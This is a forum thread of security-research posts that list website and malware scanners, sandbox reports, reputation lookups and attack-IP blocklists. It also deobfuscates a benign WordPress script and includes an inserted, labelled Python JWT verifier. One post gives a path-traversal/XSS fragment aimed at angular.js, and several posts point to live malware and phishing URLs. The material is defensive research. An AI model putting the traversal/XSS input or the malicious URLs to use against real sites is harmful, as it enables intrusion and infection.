and https://report.any.run/44c359341f1956e45ed284befb27115db2c4ef78a123234fcbbd18948d109696/0bc676ad-8d64-466f-b9fd-ad3327963fe6#generalInfo

polonus
Any.Run - An Interactive Malware Analysis Tool - Is Now Open To The Public
https://www.bleepingcomputer.com/news/security/anyrun-an-interactive-malware-analysis-tool-is-now-open-to-the-public/


Title: Re: Tests and other Media topics
Post by: polonus on November 03, 2018, 01:28:39 PM
Whenever javascript error hunting is your thingie, this YouTube video is just for you: https://www.youtube.com/watch?v=0dgmeTy7X3I
Very illustrative and instructing presentation.

It is interesting how security mechanisms within core-packages still can be circumvented by representing code in some other form, for instance via type manipulation. Just think about the sheer number of some 375.000 packages for node.js alone, where such insecurities may lurk around the corner!

Also consider how these packages could impact each other. How they could kick up insecurity through the  eco-system. Think of angular.js via %2e/%2e/etc. & alert(1) to circumvent inbuilt safety code.

Is code being skimmed and screened for such errors and insecurity, because we cannot do this automatically? A pair of eyes is always needed to do this properly.

Fine presentation via the Snyk platform and various vulnerabilities presented for json javascript libraries and ways to compromise ready-made. Read: https://snyk.io/ One could also test code there online.

Example in apis.google.com/js/plusone.js with errors detected in undefined function $ and a Syntax error, see: https://gist.github.com/ashumeow/34c11dcff0f7b2920364 -> Try to open this inside codepad. Unminified plusone.js has 377 lines of code (info source credits go to luntrus).

enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 04, 2018, 12:31:13 AM
As I found the dom-xss online scanner now almost constantly producing a "503 Over Quota",
Hey, Google, give that site another swing?!?

So I looked for an alternative.

Another test site full of tests here: https://find-xss.net/tests/?test_id=1&l=en
Also to test your score of xss vulnerability patterns.
Just for training and protection purposes.

(Do not use these info for evil purposes, as that will put you in trouble with authorities)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 05, 2018, 09:59:27 PM
Online analysis of some malware:
Where we found it: https://urlquery.net/report/7788ed09-00cf-47dc-93f1-f5a63adb6c83
Online analyses:
https://www.hybrid-analysis.com/sample/da117d759fe6aff7b76efa28028e6fcd04c56f80e8b5149fe4d3f5f16b00dc5c?environmentId=100
and: https://www.maltiverse.com/sample/092055023937e87f7926f1905c0ddf23fc85d33e987594e5535b3f995df7931e
and:
https://report.any.run/c1ada39372a4c755098718feaf45d6f7bb389a680e71944352ea2bcb63f146e4/4521ac0e-cc80-434e-9d5f-e90c155785f6
and on IP: https://cymon.io/188.209.52.136
And on security: https://www.htbridge.com/websec/?id=3jqvV8qK
Oversight: https://support.clean-mx.com/clean-mx/viruses.php?country=nl
and here: https://support.clean-mx.com/clean-mx/xmlviruses?response=alive&format=xml&fields=review,url&sa=U&ei=3p2eU8vjH4PwPLbWgJgG&ved=0CBQQFjAA&usg=AFQjCNFW6BPj8vKD_Fo-5fZfTFMi2DNXfw

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 09, 2018, 11:21:26 PM
Scanner has come to end of lifetime: (was started in 2011)
https://www.troyhunt.com/its-end-of-life-for-asafaweb/

Still there are other valuable scanners online, for instance:
https://codebeautify.org/jsvalidate

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2018, 11:05:47 PM
You own a website that runs the Word Press CMS (Content Management Software)?
Just check it from time to time,
using the following online scan engines:

https://urlquery.net/
https://sitecheck.sucuri.net
https://hackertarget.com/wordpress-security-scan/
https://retire.insecurity.today/#
https://webhint.io/scanner/
https://aw-snap.info/file-viewer/
https://observatory.mozilla.org/?

Follow up the recommendations found there or inform your web-admin/hoster of security issues detected.

Always use last versions of core-software, theme-software and plug-in software.
Update and patch continuously, and also mind to update PHP.
Retire vulnerable jQuery script(s).

Whenever in doubt post in the "virus and worms" section, and wait for a reaction.

Stay safe and secure,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 17, 2018, 05:11:25 PM
Relations from searching for a malicious IP address.
We started out here: https://www.maltiverse.com/dashboards/newioc
and found this malicious Toolbar.Conduit executable: https://www.maltiverse.com/sample/b2c78409224552a0522cd218f08b9aea18b47f2accaff3b6068c20519c5d63c2
From that hash we stumbled upon: https://www.virustotal.com/pl/file/b2c78409224552a0522cd218f08b9aea18b47f2accaff3b6068c20519c5d63c2/analysis/
and also searched at urlquery dot net: https://urlquery.net/report/a2dbd597-f2a8-4536-bffa-4c69afa4c14e
which delivered a bad request alert for us.
This while we also had these resources: https://www.malwareurl.com/ip_listing.php?ASN=AS22822
and  https://www.threatcrowd.org/domain.php?domain=s.delvenetworks.com
or: https://packettotal.com/app/analysis?id=c1a3a5f6393a42e9015251c23cc58c56&name=http
and https://www.threatminer.org/ssl.php?q=66fbc4c6f3788d27a2218571055d8076ef1297e8

IP and hash searches really make sense to find out what malware or suspicious activity lies behind a certain IP address, or what a specific hash stands for, like:
Quote
SHA256:   b2c78409224552a0522cd218f08b9aea18b47f2accaff3b6068c20519c5d63c2
Nazwa pliku:   uTorrent.exe
Współczynnik wykrycia:   6 / 67
Data analizy:   2018-10-23 06:59:10 UTC ( 3 tygodnie, 4 dni temu )

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 22, 2018, 11:08:15 PM
Security passed between two parties via JSON Web Tokens.

Editing JSON Web Tokens at jwt.io - Example > eyJhbGciOiJIUzI1NiJ9.e30.FXibJVNHsvJ6Ff-N9XtTTom9cGExRqsldHbrhAOqRUg
Quote
HEADER: ALGORITHM & TOKEN TYPE
{
  "alg": "HS256"
}
PAYLOAD: DATA
{}
VERIFY SIGNATURE
HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  your-256-bit-secret
) secret base64 encoded
Signature Verified
Libraries for Token Signing/Verification
Warning: Critical vulnerabilities in JSON Web Token libraries with asymmetric keys.
Then follow the checks..
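Added example (not jwt.io's code and not from the post): a standard-library Python signer and verifier that performs exactly the HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret) computation quoted above, pins the algorithm on the verifying side so a header announcing "none" or an asymmetric algorithm cannot be swapped in (the class of library bug the warning refers to), and decodes the token quoted in the post. The demo secret and the "sub" claim are assumptions; whether the page's placeholder secret reproduces the page's signature is not asserted here.

```python
import base64
import hashlib
import hmac
import json

# Token quoted in the post above (header {"alg":"HS256"}, payload {}).
PAGE_TOKEN = "eyJhbGciOiJIUzI1NiJ9.e30.FXibJVNHsvJ6Ff-N9XtTTom9cGExRqsldHbrhAOqRUg"
# jwt.io's placeholder secret as shown in the post; whether it yields the signature
# above is only printed by the demo, not assumed.
PAGE_SECRET = b"your-256-bit-secret"


def b64url_encode(data: bytes) -> str:
    """base64UrlEncode as JWT uses it: URL-safe alphabet, '=' padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; restores the padding the token omits."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(header: dict, payload: dict, secret: bytes) -> str:
    """HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)."""
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    tag = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(tag)


def decode_unverified(token: str):
    """Header and payload as the token claims them; proof of nothing by itself."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def hs256_verify(token: str, secret: bytes):
    """Return the payload if `token` is a valid HS256 token under `secret`, else None.

    The verifier decides the algorithm, never the token: a header that says
    "none" or names an asymmetric algorithm (RS256 etc.) is rejected before any
    key material is touched, which closes the key-confusion bug jwt.io warns about.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        given = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(
        secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(expected, given):  # constant-time comparison
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    print("page token claims:", decode_unverified(PAGE_TOKEN))
    print("page token verifies under page secret:",
          hs256_verify(PAGE_TOKEN, PAGE_SECRET) is not None)
    # Constructed token with an assumed secret and claim, not from the post.
    tok = hs256_sign({"alg": "HS256"}, {"sub": "alice"}, b"demo-secret")
    print("constructed token:", tok)
    print("verifies:", hs256_verify(tok, b"demo-secret"))
    print("wrong secret:", hs256_verify(tok, b"other"))
    none_tok = b64url_encode(b'{"alg":"none"}') + "." + tok.split(".")[1] + "."
    print("alg=none rejected:", hs256_verify(none_tok, b"demo-secret") is None)
```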

Enjoy, my good folks, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 24, 2018, 10:32:03 PM
Website scan sites come and go.

We lost asafaweb scan, which has reached End of Life.
Interesting website scanner is UpGuard Cloud Scanner: https://webscan.upguard.com/#/
Website Health Check: https://webscan.foregenix.com/
WebScan: https://www.htbridge.com/websec/

Some things lost, some things gained,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 24, 2018, 11:35:19 PM
Just to present you with the results of above mentioned scanners for and on this next website
->  https://urlquery.net/report/ea1db0cd-562a-43f3-811a-15464bac12f9
We will see various issues on security check-ups here: https://webscan.upguard.com/#/http://passmcsa.com
Bad security headers in Word Press detected: https://webscan.foregenix.com/webscan_results.html?scanid=e65cd8d6_06cb_4230_80f0_5d258de9d5ef
F-grade test result: https://www.htbridge.com/websec/?id=DZMx7uMz
Of course we have to add specific Word Press check results: user enumeration not disabled and directory listing not disabled via
https://hackertarget.com/wordpress-security-scan/ 
and 1 vuln. jQuery library to be retired -> https://retire.insecurity.today/#!/scan/7ee81e4693c6039d7b6b0debe1cc68c908ddd9a7c36e7a014a22b3a68a12a52d

Interesting on this website is that we found that the bootstrap code was altered (there were recent bug errors);
as a final note, this scan qualifies the website as clean: https://quttera.com/detailed_report/passmcsa.com
but what is that verdict worth in the light of all the security recommendations web admins had better heed?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2018, 12:53:52 AM
Searching for a particular malware: Example:
Old info and probably not reliable:
https://www.experts-exchange.com/questions/22038431/Virus-on-computerthat-symantec-cannot-remove.html
A reliable source: https://www.threatcrowd.org/listMalware.php?page=55&antivirus=TrojW
and also: https://www.threatcrowd.org/listMalware.php?page=33&antivirus=FakeMS
and also: http://zerocert.org/?code=9d2f0e2260b7c643b043b2ea87b24747110cf9812ea17f51e5645c3f37b3e94c
On a specific domain: https://urlscan.io/domain/count18.51yes.com
and also: https://www.virustotal.com/#/domain/count18.51yes.com
All starting from: https://urlquery.net/report/7451855c-f83c-40f7-92aa-79f0566371f1

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2018, 05:08:31 PM
Is your IP or host address blacklisted: http://www.anti-abuse.org/multi-rbl-check/
or here: https://whatismyipaddress.com/blacklist-check
or: https://mxtoolbox.com/blacklists.aspx

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2018, 04:01:35 PM
Several checks on websites being malicious:
https://keystonesolutions.io/solutions/lookup-potentially-malicious-websites/

Interesting background information: https://www.securityskeptic.com/malware/

Malware prevention: http://malwaredomains.lehigh.edu/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2018, 04:53:43 PM
Checking on malware information (for security researchers only):

Queried because of : https://urlquery.net/report/7e9093e0-7fae-40c8-9f42-014f156fca2d
report here: https://www.malwareurl.com/listing.php?domain=addictive.de
http://www.urlvir.com/search-host/addictive.de/
Also consider the informative scan results here: https://www.htbridge.com/websec/?id=4yPpdRiU

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 23, 2018, 09:39:58 PM
Sometimes we feel the need to do a scan on an AS.
Example to start from - https://urlquery.net/report/1891ca82-d335-448a-8862-614508466d7a
On that particular AS -> https://www.peeringdb.com/net/308
re: https://radar.qrator.net/as4134
re: http://www.cidr-report.org/cgi-bin/as-report?as=AS4134
re: https://www.spamhaus.org/statistics/botnet-asn/
background info: https://bgpmon.net/chinese-isp-hijacked-10-of-the-internet/
on botnet activity: https://zeustracker.abuse.ch/monitor.php?as=4134
re: https://isc.sans.edu/asreport.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 26, 2018, 03:40:51 PM
Various block lists of attack IP's: example IP:
https://www.abuseipdb.com/check/129.204.34.155
https://report.cs.rutgers.edu/mrtg/drop/dropstat.cgi?start=-1h
https://www.binarydefense.com/banlist.txt?__hstc=103210719.1bb630f9cde2cb5f07430159d50a3c91.1538179200074.1538179200075.1538179200076.1&__hssc=103210719.1.1538179200077&__hsfp=2025384311
https://www.axarva.co.id/blacklist-ip/blocklist.rsc
http://www.eventreader.com/firegen_malicious_ips.txt

Nice resources, enjoy, my good friends, enjoy!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2019, 05:07:55 PM
L.S.

See what malware sites were being reported to URLhaus lately: https://urlhaus.abuse.ch/browse/
Before being taken down by providers, some stay active for over a week and can infect a great many devices with malware.

In the case of Chinese malware sites, Chinese providers are known to react rather slowly; some malcode may stay on for over a month. They shouldn't be that lax. Domination on malware is not a thing to be proud of.  ;)

URLhaus, with 256 researchers, over the last 10 months achieved to have 100.000 websites taken down.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2019, 05:56:26 PM
Example of such a blacklisted site being taken down: https://urlhaus.abuse.ch/url/107430/
See: Web Server:
None
X-Powered-By:
None
IP Address:
69.90.66.40
Hosting Provider:
Cogeco Peer 1  -> https://www.privacyshield.gov/participant?id=a2zt0000000TNvtAAG&status=Active
Shared Hosting:
3 sites found on 69.90.66.40

Clean-up needed: https://sitecheck.sucuri.net/results/tekacars.com/wp-content

Re: http://69.90.66.40/cgi-sys/defaultwebpage.cgi  not secure.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 25, 2019, 05:54:30 PM
Stumbled upon this scam tester: https://www.scamner.com/latest
Could be checked also against scams at https://www.urlvoid.com/
and here: https://www.siteprice.org/tools/AdultWebsiteChecker.aspx

enjoy my friends, enjoy

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 03, 2019, 06:57:04 PM
Quite a selection of website scanners:
https://keystonesolutions.io/solutions/lookup-potentially-malicious-websites/
to look up potentially malicious websites.

Example looked up on PHISHCheck from here: wXw.hannahsartistcorner.com  -> https://www.threatminer.org/domain.php?q=www.hannahsartistcorner.com  delivering result
Quote
{"sid": 177823, "is_success": true}

Google Safebrowsing alerts for such sites like htxps://uprisefest.com/images/account/index.php with a security error,
which is being reported to PHISHTank. 
100% given as malicious here: https://zulu.zscaler.com/submission/9067b9f4-3f64-46e4-8200-a2bfe3262741

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 05, 2019, 12:10:51 AM
Different days for first time detections, are they being reported independently?

Re: https://urlhaus.abuse.ch/url/117199/   &  https://otx.alienvault.com/indicator/domain/vektorex.com
Also see external sources given there...

Our forum friend, Pondus, always being very accurate on the most recent VT results.  ;) Thank you, Pondus.

Here they'd come up with 'three days ago': https://www.virustotal.com/nl/file/199a431e655b6890e3641cda8a98cdaa5c9e4c79303aa734f1ad05eb7ba6b01c/analysis/1549019095/

and this was only yesterday: https://www.virustotal.com/nl/domain/vektorex.com/information/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 14, 2019, 09:38:35 PM
Hole in Word Press plug-ins.
A listing of vulnerable plug-ins from various resources:
https://firstsiteguide.com/tools/free-fsg/hacked-dangerous-vulnerable-wordpress-plugins/#bad_plugins

To get recommendations and tips to improve websites, scan: https://webhint.io/scanner/ & https://webscan.upguard.com/

Specifically for a quick and dirty on Word Press CMS: https://hackertarget.com/wordpress-security-scan/

Or use retire.js as a Google Chrome/Brave 1.0/ extension: https://chrome.google.com/webstore/detail/retirejs/moibopkbhjceeedibkbkbchbjnkadmom

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2019, 06:39:36 PM
Background of malware injecting script IP: https://urlquery.net/report/c843e000-63ab-4175-8cd4-864427eeabc3
See: https://www.virustotal.com/fr/url/dab0812fe89ebcac05a3f37cbad6effaa06802bf91b00535ae789f8d05096aa2/analysis/1528944320/
and https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection
and https://otx.alienvault.com/indicator/ip/134.249.116.78
and https://cymon.io/134.249.116.78   
and https://malwarebreakdown.com/2017/04/18/hacked-sites-redirecting-users-to-various-malvertising-campaigns/
How to find the backdoor: https://wordpress.stackexchange.com/questions/256050/how-to-find-the-backdoor-of-the-hack
Re: https://www.ip-finder.me/134.249.116.78/  Your IP 172.69.54.30 has been blacklisted!
and https://www.quicksilk.com/blog/1/checkpoint-10000-hacked-wordpress-sites
and https://productforums.google.com/forum/#!topic/webmasters/02BijAFd9n4
check: https://services.normshield.com/blacklist/ip/134.249.116.78

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 21, 2019, 08:05:08 PM
Resources for vulnerabilities. Example outdated vulnerable WordPress plug-in:
https://publicwww.com/websites/wp-pagenavi+2.92/

wp-pagenavi 2.92   latest release (2.93) Update required
https://lesterchan.net/portfolio/programming/php/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2019, 11:51:57 PM
Handy online tool for the javascript analyst (use with discernment and always play nice):

A good online deobfuscator of javascript: https://www.dcode.fr/javascript-unobfuscator
Proof of the pudding - "probieren geht ueber studieren" (trying beats studying):

Some harmless obfuscated code like wp-embed.min.js?ver=4.9.9
Quote
var _0x9024=["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x4D\x53\x49\x45\x20\x31\x30","\x69\x6E\x64\x65\x78\x4F\x66","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x69\x66\x72\x61\x6D\x65\x2E\x77\x70\x2D\x65\x6D\x62\x65\x64\x64\x65\x64\x2D\x63\x6F\x6E\x74\x65\x6E\x74","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x6C\x65\x6E\x67\x74\x68","\x64\x61\x74\x61\x2D\x73\x65\x63\x72\x65\x74","\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x73\x75\x62\x73\x74\x72","\x72\x61\x6E\x64\x6F\x6D","\x73\x72\x63","\x23\x3F\x73\x65\x63\x72\x65\x74\x3D","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x63\x6C\x6F\x6E\x65\x4E\x6F\x64\x65","\x73\x65\x63\x75\x72\x69\x74\x79","\x72\x65\x6D\x6F\x76\x65\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x72\x65\x70\x6C\x61\x63\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x77\x70","\x72\x65\x63\x65\x69\x76\x65\x45\x6D\x62\x65\x64\x4D\x65\x73\x73\x61\x67\x65","\x64\x61\x74\x61","\x73\x65\x63\x72\x65\x74","\x6D\x65\x73\x73\x61\x67\x65","\x76\x61\x6C\x75\x65","\x74\x65\x73\x74","\x69\x66\x72\x61\x6D\x65\x5B\x64\x61\x74\x61\x2D\x73\x65\x63\x72\x65\x74\x3D\x22","\x22\x5D","\x62\x6C\x6F\x63\x6B\x71\x75\x6F\x74\x65\x5B\x64\x61\x74\x61\x2D\x73\x65\x63\x72\x65\x74\x3D\x22","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x6E\x6F\x6E\x65","\x73\x6F\x75\x72\x63\x65","\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77","\x68\x65\x69\x67\x68\x74","\x6C\x69\x6E\x6B","\x61","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x72\x65\x66","\x68\x6F\x73\x74","\x61\x63\x74\x69\x76\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64","\x6C\x6F\x61\x64"];!function(_0x9312x1,_0x9312x2){_0x9024[0];function 
_0x9312x3(){if(!_0x9312x9){_0x9312x9=  !0;var _0x9312x1,_0x9312x3,_0x9312x4,_0x9312x5,_0x9312x6=-1!== navigator[_0x9024[3]][_0x9024[2]](_0x9024[1]),_0x9312x7=!!navigator[_0x9024[5]][_0x9024[4]](/Trident.*rv:11\./),_0x9312x8=_0x9312x2[_0x9024[7]](_0x9024[6]);for(_0x9312x3= 0;_0x9312x3< _0x9312x8[_0x9024[8]];_0x9312x3++){if(_0x9312x4= _0x9312x8[_0x9312x3],!_0x9312x4[_0x9024[10]](_0x9024[9])){_0x9312x5= Math[_0x9024[12]]().toString(36)[_0x9024[11]](2,10),_0x9312x4[_0x9024[13]]+= _0x9024[14]+ _0x9312x5,_0x9312x4[_0x9024[15]](_0x9024[9],_0x9312x5)};if(_0x9312x6|| _0x9312x7){_0x9312x1= _0x9312x4[_0x9024[16]](!0),_0x9312x1[_0x9024[18]](_0x9024[17]),_0x9312x4[_0x9024[20]][_0x9024[19]](_0x9312x1,_0x9312x4)}}}}var _0x9312x4=!1,_0x9312x9=!1;if(_0x9312x2[_0x9024[21]]){if(_0x9312x1[_0x9024[22]]){_0x9312x4=  !0}};if(_0x9312x1[_0x9024[23]]= _0x9312x1[_0x9024[23]]|| {},!_0x9312x1[_0x9024[23]][_0x9024[24]]){if(_0x9312x1[_0x9024[23]][_0x9024[24]]= function(_0x9312x3){var _0x9312x4=_0x9312x3[_0x9024[25]];if(_0x9312x4){if(_0x9312x4[_0x9024[26]]|| _0x9312x4[_0x9024[27]]|| _0x9312x4[_0x9024[28]]){if(!/[^a-zA-Z0-9]/[_0x9024[29]](_0x9312x4[_0x9024[26]])){var _0x9312x9,_0x9312x5,_0x9312x6,_0x9312x7,_0x9312x8,_0x9312xa=_0x9312x2[_0x9024[7]](_0x9024[30]+ _0x9312x4[_0x9024[26]]+ _0x9024[31]),_0x9312xb=_0x9312x2[_0x9024[7]](_0x9024[32]+ _0x9312x4[_0x9024[26]]+ _0x9024[31]);for(_0x9312x9= 0;_0x9312x9< _0x9312xb[_0x9024[8]];_0x9312x9++){_0x9312xb[_0x9312x9][_0x9024[34]][_0x9024[33]]= _0x9024[35]};for(_0x9312x9= 0;_0x9312x9< _0x9312xa[_0x9024[8]];_0x9312x9++){if(_0x9312x5= _0x9312xa[_0x9312x9],_0x9312x3[_0x9024[36]]=== _0x9312x5[_0x9024[37]]){if(_0x9312x5[_0x9024[18]](_0x9024[34]),_0x9024[38]=== _0x9312x4[_0x9024[27]]){if(_0x9312x6= parseInt(_0x9312x4[_0x9024[28]],10),_0x9312x6> 1e3){_0x9312x6= 1e3}else {if(~~_0x9312x6< 200){_0x9312x6= 200}};_0x9312x5[_0x9024[38]]= _0x9312x6};if(_0x9024[39]=== _0x9312x4[_0x9024[27]]){if(_0x9312x7= _0x9312x2[_0x9024[41]](_0x9024[40]),_0x9312x8= 
_0x9312x2[_0x9024[41]](_0x9024[40]),_0x9312x7[_0x9024[42]]= _0x9312x5[_0x9024[10]](_0x9024[13]),_0x9312x8[_0x9024[42]]= _0x9312x4[_0x9024[28]],_0x9312x8[_0x9024[43]]=== _0x9312x7[_0x9024[43]]){if(_0x9312x2[_0x9024[44]]=== _0x9312x5){_0x9312x1[_0x9024[46]][_0x9024[45]][_0x9024[42]]= _0x9312x4[_0x9024[28]]}}}}else {;}}}}}},_0x9312x4){_0x9312x1[_0x9024[22]](_0x9024[27],_0x9312x1[_0x9024[23]][_0x9024[24]],!1),_0x9312x2[_0x9024[22]](_0x9024[47],_0x9312x3,!1),_0x9312x1[_0x9024[22]](_0x9024[48],_0x9312x3,!1)}}}(window,document)

Original code that came out as the result:
Quote
'use strict';
var _0x9024 = ["use strict", "MSIE 10", "indexOf", "appVersion", "match", "userAgent", "iframe.wp-embedded-content", "querySelectorAll", "length", "data-secret", "getAttribute", "substr", "random", "src", "#?secret=", "setAttribute", "cloneNode", "security", "removeAttribute", "replaceChild", "parentNode", "querySelector", "addEventListener", "wp", "receiveEmbedMessage", "data", "secret", "message", "value", "test", 'iframe[data-secret="', '"]', 'blockquote[data-secret="', "display", "style", "none",
"source", "contentWindow", "height", "link", "a", "createElement", "href", "host", "activeElement", "location", "top", "DOMContentLoaded", "load"];
!function(_0x9312x1$jscomp$0, _0x9312x2$jscomp$0) {
function _0x9312x3$jscomp$0() {
if (!_0x9312x9$jscomp$0) {
_0x9312x9$jscomp$0 = true;
var _0x9312x1$jscomp$1;
var _0x9312x3$jscomp$1;
var _0x9312x4$jscomp$1;
var _0x9312x5$jscomp$0;
var _0x9312x6$jscomp$0 = -1 !== navigator[_0x9024[3]][_0x9024[2]](_0x9024[1]);
var _0x9312x7$jscomp$0 = !!navigator[_0x9024[5]][_0x9024[4]](/Trident.*rv:11\./);
var _0x9312x8$jscomp$0 = _0x9312x2$jscomp$0[_0x9024[7]](_0x9024[6]);
_0x9312x3$jscomp$1 = 0;
for (; _0x9312x3$jscomp$1 < _0x9312x8$jscomp$0[_0x9024[8]]; _0x9312x3$jscomp$1++) {
if (_0x9312x4$jscomp$1 = _0x9312x8$jscomp$0[_0x9312x3$jscomp$1], !_0x9312x4$jscomp$1[_0x9024[10]](_0x9024[9])) {
_0x9312x5$jscomp$0 = Math[_0x9024[12]]().toString(36)[_0x9024[11]](2, 10);
_0x9312x4$jscomp$1[_0x9024[13]] += _0x9024[14] + _0x9312x5$jscomp$0;
_0x9312x4$jscomp$1[_0x9024[15]](_0x9024[9], _0x9312x5$jscomp$0);
}
if (_0x9312x6$jscomp$0 || _0x9312x7$jscomp$0) {
_0x9312x1$jscomp$1 = _0x9312x4$jscomp$1[_0x9024[16]](true);
_0x9312x1$jscomp$1[_0x9024[18]](_0x9024[17]);
_0x9312x4$jscomp$1[_0x9024[20]][_0x9024[19]](_0x9312x1$jscomp$1, _0x9312x4$jscomp$1);
}
}
}
}
_0x9024[0];
var _0x9312x4$jscomp$0 = false;
var _0x9312x9$jscomp$0 = false;
if (_0x9312x2$jscomp$0[_0x9024[21]]) {
if (_0x9312x1$jscomp$0[_0x9024[22]]) {
_0x9312x4$jscomp$0 = true;
}
}
if (_0x9312x1$jscomp$0[_0x9024[23]] = _0x9312x1$jscomp$0[_0x9024[23]] || {}, !_0x9312x1$jscomp$0[_0x9024[23]][_0x9024[24]]) {
if (_0x9312x1$jscomp$0[_0x9024[23]][_0x9024[24]] = function(_0x9312x3$jscomp$2) {
var _0x9312x4$jscomp$2 = _0x9312x3$jscomp$2[_0x9024[25]];
if (_0x9312x4$jscomp$2) {
if (_0x9312x4$jscomp$2[_0x9024[26]] || _0x9312x4$jscomp$2[_0x9024[27]] || _0x9312x4$jscomp$2[_0x9024[28]]) {
if (!/[^a-zA-Z0-9]/[_0x9024[29]](_0x9312x4$jscomp$2[_0x9024[26]])) {
var _0x9312x9$jscomp$1;
var _0x9312x5$jscomp$1;
var _0x9312x6$jscomp$1;
var _0x9312x7$jscomp$1;
var _0x9312x8$jscomp$1;
var _0x9312xa$jscomp$0 = _0x9312x2$jscomp$0[_0x9024[7]](_0x9024[30] + _0x9312x4$jscomp$2[_0x9024[26]] + _0x9024[31]);
var _0x9312xb$jscomp$0 = _0x9312x2$jscomp$0[_0x9024[7]](_0x9024[32] + _0x9312x4$jscomp$2[_0x9024[26]] + _0x9024[31]);
_0x9312x9$jscomp$1 = 0;
for (; _0x9312x9$jscomp$1 < _0x9312xb$jscomp$0[_0x9024[8]]; _0x9312x9$jscomp$1++) {
_0x9312xb$jscomp$0[_0x9312x9$jscomp$1][_0x9024[34]][_0x9024[33]] = _0x9024[35];
}
_0x9312x9$jscomp$1 = 0;
for (; _0x9312x9$jscomp$1 < _0x9312xa$jscomp$0[_0x9024[8]]; _0x9312x9$jscomp$1++) {
if (_0x9312x5$jscomp$1 = _0x9312xa$jscomp$0[_0x9312x9$jscomp$1], _0x9312x3$jscomp$2[_0x9024[36]] === _0x9312x5$jscomp$1[_0x9024[37]]) {
if (_0x9312x5$jscomp$1[_0x9024[18]](_0x9024[34]), _0x9024[38] === _0x9312x4$jscomp$2[_0x9024[27]]) {
if (_0x9312x6$jscomp$1 = parseInt(_0x9312x4$jscomp$2[_0x9024[28]], 10), _0x9312x6$jscomp$1 > 1e3) {
_0x9312x6$jscomp$1 = 1e3;
} else {
if (~~_0x9312x6$jscomp$1 < 200) {
_0x9312x6$jscomp$1 = 200;
}
}
_0x9312x5$jscomp$1[_0x9024[38]] = _0x9312x6$jscomp$1;
}
if (_0x9024[39] === _0x9312x4$jscomp$2[_0x9024[27]]) {
